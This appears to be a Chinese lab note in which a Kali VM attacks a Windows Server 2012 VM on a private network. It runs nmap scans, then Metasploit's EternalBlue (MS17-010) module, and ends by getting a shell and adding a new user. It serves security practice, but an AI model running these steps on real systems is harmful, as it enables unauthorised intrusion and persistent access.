1、查看ip
(1)windows server 2012:192.168.72.139
(2)kali:192.168.72.128
2、关闭防火墙:控制面板-->看防火墙状态-->打开或关闭windows防火墙
3、互ping
4、信息收集:
(1)主机探测:nmap 192.168.72.0/24
(2)系统指纹识别:nmap -O 192.168.72.139
(3)服务指纹识别:nmap -sV 192.168.72.139
(4)常见漏洞探测:nmap –script=vuln 192.168.72.139
(5)打开msf(msfconsole)
(6)在msf中搜索可利用的攻击模块(search ms17-010)
(7)使用该攻击模块:use windows/smb/ms17_010_eternalblue
设置靶机ip-->设置攻击端口号-->运行/攻击
(8)出现以下内容即为成功-->提权(shell)-->添加新用户